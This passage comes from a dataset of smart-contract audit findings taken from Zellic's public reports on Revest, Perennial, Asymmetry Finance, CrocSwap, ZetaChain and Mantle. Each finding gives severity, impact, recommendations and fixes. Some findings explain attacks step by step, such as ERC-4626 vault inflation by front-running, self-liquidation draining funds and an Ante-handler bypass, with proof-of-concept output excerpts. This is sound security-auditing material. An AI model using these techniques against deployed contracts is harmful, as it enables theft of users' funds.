asset pools. Revest has implemented the following solution in committ 00000000000: if (order.depositedShares > 0 && IERC4626(vaultAdapters[pool.vault]). asset() == pool.asset) We find their remediation adequately addresses the concerns of this finding. Zellic Revest Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Revest Resonate Pt. 1 - Zellic Audit Report.pdf" + }, + { + "title": "3.5 Missing validation check in proxyCall filter can allow dan- gerous calls", + "labels": [ + "Zellic" + ], + "body": "Target: ResonateSmartWallet Category: Business Logic Likelihood: Low Severity: Low : Low The proxyCall function has checks to ensure no calls made to it result in a decrease of capital. However, it has incomplete checks to ensure there are no calls made that could result in a future decrease of capital. For example, it currently includes a filter for approve but none for newer functions like increaseAllowance. The proxyCall function can only be called by the sandwich bot. In the case of a com- promise or a security incident involving keys, the lack of the requisite checks could result in a loss of funds. We recommend adding a check for the increaseAllowance function selector. The use of an adjustable white list or black list to control allowed functions would pro- vide additional flexibility for unforseen risky functions. The management of the white list/black list should be delegated to another administrative account to limit central- ization risk. Revest has indicated this will be resolved at deployment-time by modifying the deployment- script to include the increaseAllowance function signature. Zellic Revest Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Revest Resonate Pt. 1 - Zellic Audit Report.pdf" + }, + { + "title": "3.6 Centralization risk", + "labels": [ + "Zellic" + ], + "body": "Target: Project Wide Category: Business Logic Likelihood: N/A Severity: Low : Low At the end of deployment and configuration of the AddressLockProxy, OutputRe- ceiverProxy, ResonateHelper, and Resonate, ownership is primarily concentrated in a single account. However, a specially designated sandwich bot is able to access the proxyCall(...))) and sandwichSnapshot functions in the ResonateHelper. These func- tions cannot move funds outside of the system but can move the location of funds within the system for the purpose of snapshot voting. When new pools are added to resonate they are created along with their own ResonateSmartWallet and PoolS- martWallet contracts. These wallets can only be accessed by Resonate. There are no owners of the ERC4626 adapters used to interface between Resonate and the vaults. In general, the owner of Resonate cannot stop the protocol or withdraw funds other than through regular use of the protocol. However, they are in control of the address of the oracle. By manipulating the price of the oracle they could grossly inflate the number of packets a producer order is entitled to and profit from matches with con- sumer orders (more in the discussion on oracle risk). The protocol relies heavily on the proper functioning of several external vaults. Under the current scope of this audit these include Aave and Yearn. Compromise of these vaults could break the system and result in loss of funds. This is viewed as an accept- able and necessary risk. Resonate also relies on several key contracts in the Revest ecosystem. These include a registry that returns the address of Revest and the FNFT Handler. Compromise of this registry could direct Resonate to interact with compromised contracts. Furthermore, compromise of Revest or the FNFT handler could break the protocol or result in loss of funds. For example, Revest is responsible for calling critical functions in Resonate for claiming interest and principal. The burning of FNFTs is handled by Revest, and the FNFT handler and its compromise could potentially result in repeated claiming of interest and/or principal. Control of Resonate is heavily concentrated in a single account; however, compro- mise of this account presents limited vectors for exploitation. A compromised owner account could alter the price oracle to one in their control and use this to exploit the Zellic Revest Finance system for financial gain. The compromise of the sandwich bot could result in abuse of proxyCall and sandwic hSnapshot, which could disrupt the proper functioning of the protocol. The use of a multisignature address wallet can prevent an attacker from causing eco- nomic damage in the event a private key is compromised. Timelocks can also be used to catch malicious executions. It should be verified that this practice is being followed for not just the core Resonate contracts (including the sandwich bot) but also the other contracts it interacts with listed above. The oracle should be carefully set to a trusted source such as ChainLink or an alter- native that uses a sufficiently long TWAP. Care needs to be taken in ensuring the price oracle cannot be manipulated through flash loans or other means of attack. Revest has provided a highly detailed response which adequately addresses our con- cerns around the access management of critical contracts. Their procedures for man- aging centralization risk include the following: Resonate will use, at a minimum, a 3 of 5 multisig. No more than a simple ma- jority will be core team members, the remainder will be drawn from the com- munity. The members of the Resonate multisig will have no more than two members overlapping with the Revest multisig. Sandwich bot access will initially align with Resonate access. Revest currently uses a 3 of 7 mutlisig. This will be upgraded to a 4 of 7 soon. The registry is currently controlled by a multisig. A multisig will be used to control the oracle systems. The FNFT handler is immutable. An individual will posesses no more than one key on a given multisig. In gen- eral the use of hardware wallets is either mandated (Resonate) or encouoraged (Revest, non-officers). As progressive decentralization occurs, control over many of the contracts in the Revest-Resonate ecosystem will be migrated to intermediary contracts/DAOs. Zellic Revest Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Revest Resonate Pt. 1 - Zellic Audit Report.pdf" + }, + { + "title": "3.1 ERC-4626 inflation attack on Vault", + "labels": [ + "Zellic" + ], + "body": "Target: Vault.sol Category: Business Logic Likelihood: High Severity: Critical : Critical Vault is vulnerable to an ERC-4626\u2013style inflation attack. In accordance with ERC-4626, Vault is a vault that holds assets on behalf of its users, and whenever a user deposits assets, it issues to the user a number of shares such that the proportion of the user\u2019s shares over the total issued shares is equal to the user\u2019s assets over the total withdrawable assets. This allows assets gained by Vault to increase the value of every user\u2019s shares in a proportional way. ERC-4626 vaults are susceptible to inflation attacks; however, an attacker can \u201cdo- nate\u201d funds to the vault without depositing them, increasing the value of a share un- expectedly. In some circumstances, including when an unsuspecting user is the first depositor, an attacker can make back more than they donated, stealing value from the first depositor. We created a proof of concept (POC) for this bug (section 7.1). In this POC, a vault is empty (has no coin balance and zero issued shares), and then a benign user submits a transaction depositing 1,000 coins to the mempool. Before the deposit transaction is mined, an attacker front-runs it with an earlier trans- action, which deposits 0.000001 coins and then donates 1,000 coins to the vault. After this, the attacker has one share and the vault has 1,000.000001 coins. Then, the user\u2019s deposit transaction is mined. After the user\u2019s deposit, the vault has 2,000.000001 coins, of which 1,000 was just deposited by the user. Since shares are now worth 1,000.0000005 coins after the attacker\u2019s front-run transactions, the user is given less than one share, which the vault rounds to zero. Finally, the attacker, with their one share that represents all the issued shares, with- draws all of the assets, stealing the user\u2019s coins. An excerpt of the POC output is shown below: Zellic Equilibria start ---)) state ---)) user shares: 0 user balance: 100000.0 attacker shares: 0 attacker balance: 100000.0 ------------- user signs tx depositing 1000, tx in mempool seen by attacker attacker frontruns with a deposit of 0.000001 and a donation of 1000 ---)) state ---)) user shares: 0 user balance: 100000.0 attacker shares: 1 attacker balance: 98999.999999 ------------- user deposit of 1000 occurs ---)) state ---)) user shares: 0 user balance: 99000.0 attacker shares: 1 attacker balance: 98999.999999 ------------- attacker withdraws all coins ---)) state ---)) user shares: 0 user balance: 99000.0 attacker shares: 0 attacker balance: 101000.08684 ------------- Please see Github issue #3706 in OpenZeppelin for discussion about how to mitigate this vulnerability. Zellic Equilibria In short, the first deposit to a new Vault could be made by a trusted admin during Vault construction to ensure that totalSupply remains greater than zero. However, this remediation has the drawback that this deposit is essentially locked, and it needs to be high enough relative to the first few legitimate deposits such that front-running them is unprofitable. Even if this prevents the attack from being profitable, an attacker can still grief legitimate deposits with donations, making the user gain less shares than they should have gained. Another solution is to track totalAssets internally, by recording the assets gained through its Market positions and not increasing it when donations occur. This makes the attack significantly harder, since the attacker would have to donate funds by af- fecting price feeds for the underlying assets rather than just sending tokens to the Vault. This finding was acknowledged and a fix was implemented in commit a1b8140e. Zellic Equilibria", + "html_url": "https://github.com/Zellic/publications/blob/master/Perennial - Zellic Audit Report.pdf" + }, + { + "title": "3.2 High-volatility ticks can cause bank run due to negative liq- uidations", + "labels": [ + "Zellic" + ], + "body": "Target: Market.sol Category: Business Logic Likelihood: Low Severity: High : High The liquidation mechanism in Market.sol calculates the maintenance (minimum col- lateral) and liquidation fee for a given position as follows: function liquidationFee( Position memory self, OracleVersion memory latestVersion, RiskParameter memory riskParameter ) internal pure returns (UFixed6) { return maintenance(self, latestVersion, riskParameter) .mul(riskParameter.liquidationFee) .min(riskParameter.maxLiquidationFee) .max(riskParameter.minLiquidationFee); } function maintenance( Position memory self, OracleVersion memory latestVersion, RiskParameter memory riskParameter ) internal pure returns (UFixed6) { if (magnitude(self).isZero()) return UFixed6Lib.ZERO; return magnitude(self) .mul(latestVersion.price.abs()) .mul(riskParameter.maintenance) .max(riskParameter.minMaintenance); } Since the liquidation fee is not constrained to be less than the collateral, a high- volatility tick can cause the liquidation fee to exceed the deposited collateral. When this happens, the liquidation itself will cause the position to end with negative col- lateral. So, if a user opens a position with collateral very close to maintenance, the position can then be self-liquidated for more than the deposited collateral following Zellic Equilibria a volatile tick. We created a proof of concept (POC) for this bug (section 7.2). In this POC, we demon- strate a scenario where the first depositor can self-liquidate the position for more than their deposit, effectively stealing other users\u2019 funds and making the market insolvent. An excerpt of the POC output is shown below: User deposits collateral Deposited collateral: 1000000000 Volatile click changes price to 1.5 Position liquidated collateral after liquidation: -1001000000 token earned by liquidator: 1001000000 attack successful It is to be noted that although an organic bank run scenario is possible, it does require a fairly volatile tick from the oracle under appropriate tuning parameters. For example, for a power two oracle with riskParameter.liquidationFee = 0.5, we would need a 48% price change between two subsequent oracle ticks. With risk Parameter.liquidationFee = 0.7, the required volatility is 18%. These values, while feasible, are still rare in practice. There are two other possible exploitation scenarios. 1. It may be used as a backdoor by a malicious oracle operator to drain the market relying on it. 2. It may lead to a malicious user trying to intentionally exploit this as an infinite money glitch by opening a number of positions and self-liquidating them. How- ever, such a user would need to anticipate an incoming volatile tick. A permanent fix would require liquidations to be capped at the total deposited assets of a user. However, the current Perennial design does not track the total deposit for Zellic Equilibria an account, so implementing that would require a considerable amount of rewrites. For now, this possibility should be minimized via appropriate parameter tuning on a per-market level. This issue has been acknowledged by Equilibria. Zellic Equilibria", + "html_url": "https://github.com/Zellic/publications/blob/master/Perennial - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Markets missing slippage protection", + "labels": [ + "Zellic" + ], + "body": "Target: Market.sol Category: Business Logic Likelihood: Medium Severity: Medium : Medium Since the markets have delayed settlements to mitigate arbitrage, the positions opened by users are settled at a later price. Under normal circumstances, the dif- ference in price between when a position is opened and when it is settled should be fairly small. However, volatility in the price feed can cause unexpected fluctuations. Preventing unexpected losses requires a slippage-protection mechanism. Users may lose funds due to unexpected volatility given the lack of a slippage- protection mechanism. Slippage protection could be implemented at the oracle-level. While making a version invalid might be difficult, one simple way to handle it would be to cancel trades if the price difference between two versions exceeds a certain threshold. Adding an additional unsafe flag that users can set would keep it usable for users who want to bypass this protection. This issue has been acknowledged by Equilibria. Zellic Equilibria", + "html_url": "https://github.com/Zellic/publications/blob/master/Perennial - Zellic Audit Report.pdf" + }, + { + "title": "3.4 Reentrancy in MultiInvoker due to calls to unauthenticated contracts", + "labels": [ + "Zellic" + ], + "body": "Target: MultiInvoker.sol Category: Coding Mistakes Likelihood: Medium Severity: Low : Low The MultiInvoker is a contract that allows end users to atomically compose several Market and Vault calls into a single transaction, saving gas and ensuring safety because the user can be assured that no other transactions can run between their sequence of transactions. In order to do this, it makes external calls to other contracts, including Market, Vault, and DSU. However, there is no check in MultiInvoker that the addresses supplied are valid contracts registered with their respective factories. MultiInvoker can be called with arbitrary contracts, which can lead to unexpected reentrancy behavior. MultiInvoker should check the provided market or vault address against MarketFac- tory/VaultFactory respectively to verify that it is a valid instance. This finding was acknowledged and a fix was implemented in commit fa7e1c09 with the addition of the following two modifiers: ///)) @notice Target market must be created by MarketFactory modifier isMarketInstance(IMarket market) { if(!marketFactory.instances(market)) revert MultiInvokerInvalidInstanceError(); _; } ///)) @notice Target vault must be created by VaultFactory modifier isVaultInstance(IVault vault) { Zellic Equilibria if(!vaultFactory.instances(vault)) revert MultiInvokerInvalidInstanceError(); _; } Zellic Equilibria", + "html_url": "https://github.com/Zellic/publications/blob/master/Perennial - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Reentrancy in withdrawEth", + "labels": [ + "Zellic" + ], + "body": "Target: SafEth Category: Coding Mistakes Likelihood: Low Severity: Medium : Medium SafEth supports preminting, where the owner of the contract can stake some ETH and create a supply of SafEth. Staking into this supply is significantly cheaper (in gas) than exchanging every derivative. Whenever a user tries to stake an amount less than what is preminted, the input ETH will go to the SafEth contract and the user is instead given SafEth from the preminted supply, and the contract\u2019s ethToClaim will increase. The contract owner has access to a function that withdraws the ETH used to premint SafEth. function withdrawEth() external onlyOwner { /) solhint-disable-next-line (bool sent, ) = address(msg.sender).call{value: ethToClaim}(\u201d\u201d); if (!sent) revert FailedToSend(); ethToClaim = 0; } This function lacks a reentrancy check and only resets the ethToClaim when the func- tion ends. If the owner is compromised and replaced with a contract that reenters on payment, it is possible to extract all the ETH residing in the contract. However, the only current way to add ETH directly to the SafEth contract is through the premint staking mechanism. From the code pattern of tracking ethToClaim, it is clear that the intention is not to withdraw all the ETH in the contract through this function. A compromised owner can empty the ETH balance of SafEth. Currently this is less of a problem because ETH rarely resides in the contract outside of the intended mecha- nism. However, the fix is easy and blocks future upgrades of the contract from being drained if it stores ETH. Zellic Asymmetry Finance We recommend modifying the function to comply with the checks-effects- interactions pattern, function withdrawEth() external onlyOwner { uint256 _ethToClaim = ethToClaim; ethToClaim = 0; /) solhint-disable-next-line (bool sent, ) = address(msg.sender).call{value: _ethToClaim}(\u201d\u201d); if (!sent) revert FailedToSend(); } or add a reentrancy guard to the function. This issue has been acknowledged by Asymmetry Finance, and a fix was implemented in commit dc7b9c8e. Zellic Asymmetry Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Asymmetry Finanace safETH - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Function doMultiStake() does not spend all input ETH", + "labels": [ + "Zellic" + ], + "body": "Target: SafEth Category: Coding Mistakes Likelihood: Medium Severity: Medium : Medium When a user wants to stake more than singleDerivativeThreshold, and there is not enough left in the premint supply, the contract ends up calling doMultiStake(), which does a weighted stake into multiple derivatives. ...)) uint256 amountStaked = 0; for (uint256 i = 0; i < derivativeCount; i+)) { if (!derivatives[i].enabled) continue; uint256 weight = derivatives[i].weight; if (weight =) 0) continue; IDerivative derivative = derivatives[i].derivative; uint256 ethAmount = i =) derivativeCount - 1 ? msg.value - amountStaked : (msg.value * weight) / totalWeight; amountStaked += ethAmount; ...)) } ...)) This portion of the code shows that it is iterating over all the derivatives, skipping the disabled ones. For each derivative, it stakes (msg.value * weight) / totalWeight ETH, which rounds down slightly due to integer division. To account for the rounding issue, the last iteration stakes msg.value - amountStaked, where the latter is the accumulated value of staked ETH so far. If the last derivative is disabled, the last iteration is skipped due to if (!derivatives[i].enabled) continue;, and the rounding is not accounted for. When the last derivative is disabled, and depending on the actual weights and the staked amount, a small percentage of the staked amount can be left in the contract. This will not be caught by the derivative slippage checks, but it can be caught by the Zellic Asymmetry Finance user\u2019s _minOut parameter when properly set. Disabling the last derivative in the list thus leads to either a loss of funds for the user or blocking the functionality of staking into multiple derivatives from working. The protocol should not rely on the last derivative to be enabled. A possible fix could be to implement something like a getLastEnabledDerivativeIndex() instead, which returns the real index of the last derivative, replacing derivativeCount -1. This can also reduce the amount of iterations ran by the for loop. This issue has been acknowledged by Asymmetry Finance, and a fix was implemented in commit e4a2864e. Zellic Asymmetry Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Asymmetry Finanace safETH - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Function firstUnderweightDerivativeIndex() returns a valid index on error", + "labels": [ + "Zellic" + ], + "body": "Target: SafEth Category: Coding Mistakes Likelihood: Medium Severity: Medium : Medium When a single stake is triggered, the SafEth contract tries to find the best target deriva- tive to stake into by calling firstUnderweightDerivativeIndex(). function doSingleStake( uint256 _minOut, uint256 price ) private returns (uint256 mintedAmount) { uint256 totalStakeValueEth = 0; IDerivative derivative = derivatives[firstUnderweightDerivativeIndex()] .derivative; uint256 depositAmount = derivative.deposit{value: msg.value}(); ...)) } ...)) function firstUnderweightDerivativeIndex() private view returns (uint256) { uint256 count = derivativeCount; uint256 tvlEth = totalSupply() * approxPrice(false); if (tvlEth =) 0) return 0; for (uint256 i = 0; i < count; i+)) { if (!derivatives[i].enabled) continue; uint256 trueWeight = (totalWeight * IDerivative(derivatives[i].derivative).balance() * IDerivative(derivatives[i].derivative).ethPerDerivative( false )) / tvlEth; if (trueWeight < derivatives[i].weight) return i; Zellic Asymmetry Finance } return 0; } The function iterates over all the enabled derivatives, calculating a \u201ctrue weight\u201d by calculating (totalWeight * derivative_balance_value_in_ETH) / safEth_value_i n_ETH. If this value is less than the derivative weight, it is considered underweight and has its index returned. Disabled derivatives are not considered, and their non- contribution is already accounted for in totalWeight. If the total supply of SafEth is 0, or none of the derivatives are considered under- weight, a default value of 0 is returned. This index is then used in doSingleStake with- out checking if that derivative is disabled. If none of the derivatives are underweight, or the total supply of SafEth is 0, a sin- gle stake can end up staking into a disabled derivative. The functionality of disabling derivatives is used in the cases when they appear to be more centralized or get de- pegged or corrupted somehow. Depending on the reason for disabling the derivative, the impact can vary greatly, from total loss of funds to just giving business to a deriva- tive that is getting too centralized. There are many proper ways to fix this. One example could be this: for both tvlEth =) 0 and the default return, fall back to finding the first nondisabled derivative. Revert if there are none. This issue has been acknowledged by Asymmetry Finance, and a fix was implemented in commit 4247587b. Zellic Asymmetry Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Asymmetry Finanace safETH - Zellic Audit Report.pdf" + }, + { + "title": "3.4 Floor price is reset on consecutive premints", + "labels": [ + "Zellic" + ], + "body": "Target: SafEth Category: Coding Mistakes Likelihood: Low Severity: Medium : Low When the contract owner premints SafEth, the depositPrice value returned from call- ing stake() is saved. It is stored in the global value floorPrice and acts as a minimum price to be paid when using the preminted supply during staking. Thanks to the floo rPrice, the owners will be able to recoup their investment even if the price should go down later. function preMint( uint256 _minAmount, bool _useBalance ) external payable onlyOwner returns (uint256) { uint256 amount = msg.value; ...)) (uint256 mintedAmount, uint256 depositPrice) = this.stake{ value: amount }(_minAmount); floorPrice = depositPrice; ...)) } function shouldPremint(uint256 price) private view returns (bool) { uint256 preMintPrice = price < floorPrice ? floorPrice : price; uint256 amount = (msg.value * 1e18) / preMintPrice; return amount <) preMintedSupply &) msg.value <) maxPreMintAmount; } In the preMint() function, floorPrice is set directly and will overwrite the previous value there. If a premint is executed during a time when the price is high, floorPrice will be set to that high price. If another premint happens before the previous supply is depleted, Zellic Asymmetry Finance the floorPrice will be reset to the new depositPrice. If the price changed, this will under or overvalue the remaining preminted supply. The owner will then risk losing parts of the ETH invested during preminting, as it gets valued at a lower price than it was traded at. If the premint supply is (more or less) depleted before minting again, the problem can be avoided. There is no easy way to tie a certain price to just a part of the premint supply. A possibility could be to introduce a parameter bool reset_floorprice to preMint(), which allows the floorPrice to be reduced. Otherwise, it is limited to only increase, or it remains unchanged (but is checked to be within some limit). This issue has been acknowledged by Asymmetry Finance, and a fix was implemented in commit ac8ae472. Zellic Asymmetry Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Asymmetry Finanace safETH - Zellic Audit Report.pdf" + }, + { + "title": "3.2 The function safeTransfer can fail silently", + "labels": [ + "Zellic" + ], + "body": "Target: TransferHelper.sol Category: Business Logic Likelihood: Low Severity: Low : Low The functions safeTransfer and safeTransferFrom use low-level function call for to- kens transferring, which return true value in case of calling non-existent contract. function safeTransfer( address token, address to, uint256 value) internal { (bool success, bytes memory data) = token.call(abi.encodeWithSelector(IERC20Minimal.transfer. selector, to, value)); require(success &) (data.length =) 0 |) abi.decode(data, (bool))) , \u201cTF\u201d); } Since there is no verification of the existence of the contract being called, in the case described above, the transaction will be counted as successful despite the fact that the tokens will not be sent. Although, when initializing the pool, it is checked that the contract balance has been increased by the expected value of liquidity, which makes unpossible the creation of a pool for non-existent tokens. But they will be checked only in case newPoolLiq_ was set, otherwise pool will be created without initial liquidity. Explicitly check the existence of contracts before transferring tokens. TBD Zellic Crocodile Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/CrocSwap - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Ethermint Ante handler bypass", + "labels": [ + "Zellic" + ], + "body": "Target: app/ante/handler_options.go Category: Coding Mistakes Likelihood: High Severity: High : High In commit 3362b13 a fix was added in order to prevent the Ethermint Ante handler from being bypassed (see https://jumpcrypto.com/writing/bypassing-ethermint- ante-handlers/). The patch was based on the original fix implemented in Evmos, but the issue is that ZetaChain has the x/group module enabled, which allows for a new way of bypassing the Ante handler. The group.MsgSubmitProposal allows for arbitrary messages to be run when the pro- posal is passed: /) MsgSubmitProposal is the Msg/SubmitProposal request type. type MsgSubmitProposal struct { /) group_policy_address is the account address of group policy. GroupPolicyAddress string `protobuf:\u201dbytes,1,opt,name=group_policy_address,json=groupPolicyAddre ss,proto3\u201d json:\u201dgroup_policy_address,omitempty\u201d` /) proposers are the account addresses of the proposers. /) Proposers signatures will be counted as yes votes. Proposers []string `protobuf:\u201dbytes,2,rep,name=proposers,proto3\u201d json:\u201dproposers,omitempty\u201d` /) metadata is any arbitrary metadata to attached to the proposal. Metadata string `protobuf:\u201dbytes,3,opt,name=metadata,proto3\u201d json:\u201dmetadata,omitempty\u201d` /) messages is a list of `sdk.Msg`s that will be executed if the proposal passes. Messages []*types.Any `protobuf:\u201dbytes,4,rep,name=messages,proto3\u201d json:\u201dmessages,omitempty\u201d` /) exec defines the mode of execution of the proposal, /) whether it should be executed immediately on creation or not. Zellic ZetaChain /) If so, proposers signatures are considered as Yes votes. Exec Exec `protobuf:\u201dvarint,5,opt,name=exec,proto3,enum=cosmos.group.v1.Exec\u201d json:\u201dexec,omitempty\u201d` } Since anyone can create a group with themselves as the only member, they can then submit a proposal with a message that will be executed immediately using the Exec option of Try. The checkDisabledMsgs function is only checking for authz messages, and so the group proposal will not be filtered: func (ald AuthzLimiterDecorator) checkDisabledMsgs(msgs []sdk.Msg, isAuthzInnerMsg bool, nestedLvl int) error { if nestedLvl >) maxNestedMsgs { return fmt.Errorf(\u201dfound more nested msgs than permited. Limit is : %d\u201d, maxNestedMsgs) } for _, msg :) range msgs { switch msg :) msg.(type) { case *authz.MsgExec: innerMsgs, err :) msg.GetMessages() if err !) nil { return err } nestedLvl+) if err :) ald.checkDisabledMsgs(innerMsgs, true, nestedLvl); err !) nil { return err } case *authz.MsgGrant: authorization, err :) msg.GetAuthorization() if err !) nil { return err } url :) authorization.MsgTypeURL() if ald.isDisabledMsg(url) { return fmt.Errorf(\u201dfound disabled msg type: %s\u201d, url) } default: url :) sdk.MsgTypeURL(msg) Zellic ZetaChain if isAuthzInnerMsg &) ald.isDisabledMsg(url) { return fmt.Errorf(\u201dfound disabled msg type: %s\u201d, url) } } } return nil } Similar to the original finding in section 3.11 of the April 21st, 2023 report, this can be used to steal the transaction fees for the current block, and also to trigger an infinite loop, halting the entire chain. A new case should be added to the checkDisabledMsgs method to check the group.M sgSubmitProposal message in the same way as the existing messages: case *group.MsgSubmitProposal: innerMsgs, err :) msg.GetMsgs() if err !) nil { return err } nestedLvl+) if err :) ald.checkDisabledMsgs(innerMsgs, true, nestedLvl); err !) nil { return err } This issue has been acknowledged by ZetaChain, and a fix was implemented in com- mit cd279b80. Zellic ZetaChain", + "html_url": "https://github.com/Zellic/publications/blob/master/ZetaChain - 7.12.23 Zellic Audit Report.pdf" + }, + { + "title": "3.2 Missing nil check when parsing client event", + "labels": [ + "Zellic" + ], + "body": "Target: evm_client.go Category: Coding Mistakes Likelihood: High Severity: High : High One of the responsibilities of the Zetaclient is to watch for incoming transactions and handle any ZetaSent events emitted by the connector. logs, err :) connector.FilterZetaSent(&bind.FilterOpts{ Start: uint64(startBlock), End: &tb, Context: context.TODO(), }, []ethcommon.Address{}, []*big.Int{}) if err !) nil { ob.logger.ChainLogger.Warn().Err(err).Msgf(\u201dobserveInTx: FilterZetaSent error:\u201d) return } /) Pull out arguments from logs for logs.Next() { event :) logs.Event ob.logger.ExternalChainWatcher.Info().Msgf(\u201dTxBlockNumber %d Transaction Hash: %s Message : %s\u201d, event.Raw.BlockNumber, event.Raw.TxHash, event.Message) destChain :) common.GetChainFromChainID(event.DestinationChainId.Int64()) destAddr :) clienttypes.BytesToEthHex(event.DestinationAddress) When fetching the destination chain, common.GetChainFromChainID(event.Destinatio nChainId.Int64()) is used, which will return nil if the chain is not found. func GetChainFromChainID(chainID int64) *Chain { chains :) DefaultChainsList() for _, chain :) range chains { if chainID =) chain.ChainId { return chain } } Zellic ZetaChain return nil } Since a user is able to specify any value for the destination chain, if a nonsupported chain is used, then destChain will be nil and the following destChain.ChainName call will cause the client to crash. As all the clients watching the remote chain will see the same events, a malicious user (or a simple mistake entering the chain) will cause all the clients to crash. If the clients automatically restart and try to pick up from the block they were up to (the default), then they will crash again and enter into an endless restart and crash loop. This will prevent any incoming or outgoing transactions on the remote chain from being processed, effectively halting that chain\u2019s integration. There should be an explicit check to ensure that destChain is not nil and to skip the log if it is. It would also be a good idea to have a recovery mechanism that can handle any blocks that cause the client to crash and skip them. This will help prevent the remote chain from being paused if a similar bug occurs again. This issue has been acknowledged by ZetaChain, and a fix was implemented in com- mit 542eb37c. Zellic ZetaChain", + "html_url": "https://github.com/Zellic/publications/blob/master/ZetaChain - 7.12.23 Zellic Audit Report.pdf" + }, + { + "title": "3.3 Admin policy check will always fail", + "labels": [ + "Zellic" + ], + "body": "Target: keeper_out_tx_tracker.go Category: Coding Mistakes Likelihood: Medium Severity: Medium : Medium The AddToOutTxTracker was changed from allowing bonded validators to call it to al- lowing an admin policy account or one of the current observers: func (k msgServer) AddToOutTxTracker(goCtx context.Context, msg *types.MsgAddToOutTxTracker) (*types.MsgAddToOutTxTrackerResponse, error) { ctx :) sdk.UnwrapSDKContext(goCtx) chain :) k.zetaObserverKeeper.GetParams(ctx).GetChainFromChainID(msg.ChainId) if chain =) nil { return nil, zetaObserverTypes.ErrSupportedChains } authorized :) false if msg.Creator =) k.zetaObserverKeeper.GetParams(ctx).GetAdminPolicyAccount (zetaObserverTypes.Policy_Type_out_tx_tracker) { authorized = true } ok, err :) k.IsAuthorized(ctx, msg.Creator, chain) if err !) nil { return nil, err } if ok { authorized = true } if !authorized { return nil, sdkerrors.Wrap(types.ErrNotAuthorized, fmt.Sprintf(\u201dCreator %s\u201d, msg.Creator)) } The issue is that the admin account is unlikely to be an observer, and so the check to IsAuthorized will return an error and the function will return. Zellic ZetaChain The admin policy will not work as expected and will be unable to add to the out tracker. The function should be refactored to allow for either the admin or the observers to access it instead of returning early if the caller is not an observer. This issue has been acknowledged by ZetaChain, and a fix was implemented in com- mit 8222734c. Zellic ZetaChain", + "html_url": "https://github.com/Zellic/publications/blob/master/ZetaChain - 7.12.23 Zellic Audit Report.pdf" + }, + { + "title": "3.1 The initialize function is not using the initializer modi- fier", + "labels": [ + "Zellic" + ], + "body": "Target: L1StandardBridge Category: Coding Mistakes Likelihood: Medium Severity: High : High The initialize function in L1StandardBridge is not using the initializer modifier but instead uses messenger to verify if the function has already been initialized or not. If this contract is accidently initialized with messenger set to address(0), an attacker can reinitialize the contract and thus steal tokens from the contract using the withdrawal functions. function initialize(address _l1messenger, address _l2TokenBridge, address _l1MantleAddress) public { require(messenger =) address(0), \u201dContract has already been initialized.\u201d); messenger = _l1messenger; l2TokenBridge = _l2TokenBridge; l1MantleAddress = _l1MantleAddress; } If there are any tokens in the contract and the messenger is set to address(0), an at- tacker can steal those tokens from the contract. Use the initializer modifier, or in the initialize function, revert the transaction if any parameter is address(0). Zellic Mantle Network This issue has been acknowledged by Mantle Network, and a fix was implemented in commit a53dd956. Zellic Mantle Network", + "html_url": "https://github.com/Zellic/publications/blob/master/Mantle - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Protocol does not account for fee-on-transfer tokens", + "labels": [ + "Zellic" + ], + "body": "Target: L1StandardBridge Category: Business Logic Likelihood: Low Severity: Low : Low The _initiateERC20Deposit function does not account for tokens that charge fees on transfer. There is an expectation that the _amount of tokens deposited to the project contract when calling depositERC20To or depositERC20 will be equal to the amount of tokens deposited, and hence the mapping deposits is updated by adding the same _amount. However, there are ERC-20s that do, or may in the future, charge fees on transfer that will violate this expectation and affect the contract\u2019s accounting in the deposits mapping. Below is the function _initiateERC20Deposit from the L1StandardBridge contract (some part of the function is replaced by /) [removed code] to only show the relevant code): function _initiateERC20Deposit( address _l1Token, address _l2Token, address _from, address _to, uint256 _amount, uint32 _l2Gas, bytes calldata _data ) internal { /) When a deposit is initiated on L1, the L1 Bridge transfers the funds to itself for future /) withdrawals. The use of safeTransferFrom enables support of \u201dbroken tokens\u201d which do not /) return a boolean value. /) slither-disable-next-line reentrancy-events, reentrancy-benign IERC20(_l1Token).safeTransferFrom(_from, address(this), _amount); /) [removed code] /) slither-disable-next-line reentrancy-benign deposits[_l1Token][_l2Token] = deposits[_l1Token][_l2Token] + _amount; Zellic Mantle Network /) slither-disable-next-line reentrancy-events emit ERC20DepositInitiated(_l1Token, _l2Token, _from, _to, _amount, _data); } The deposits mapping will overestimate the amount of fee-on-transfer tokens in the contract. Consider implementing a require check that compares the contract\u2019s balance before and after a token transfer to ensure that the expected amount of tokens are trans- ferred. function _initiateERC20Deposit( address _l1Token, address _l2Token, address _from, address _to, uint256 _amount, uint32 _l2Gas, bytes calldata _data ) internal { /) When a deposit is initiated on L1, the L1 Bridge transfers the funds to itself for future /) withdrawals. The use of safeTransferFrom enables support of \u201dbroken tokens\u201d which do not /) return a boolean value. /) slither-disable-next-line reentrancy-events, reentrancy-benign uint256 expectedTransferBalance = IERC20(_l1Token).balanceOf(address(this)) + _amount; IERC20(_l1Token).safeTransferFrom(_from, address(this), _amount); uint256 postTransferBalance = IERC20(_l1Token).balanceOf(address(this)); require(expectedTransferBalance =) postTransferBalance, \u201dFee on transfer tokens not supported\u201d); Zellic Mantle Network /) [removed code] /) slither-disable-next-line reentrancy-benign deposits[_l1Token][_l2Token] = deposits[_l1Token][_l2Token] + _amount; /) slither-disable-next-line reentrancy-events emit ERC20DepositInitiated(_l1Token, _l2Token, _from, _to, _amount, _data); } This issue has been acknowledged by Mantle Network, and a fix was implemented in commit 305b5cab. Zellic Mantle Network", + "html_url": "https://github.com/Zellic/publications/blob/master/Mantle - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Possible rounding issues in L1MantleToken", + "labels": [ + "Zellic" + ], + "body": "Target: L1MantleToken Category: Business Logic Likelihood: N/A Severity: Informational : Informational The mint function in L1MantleToken calculated the maximumMintAmount using the 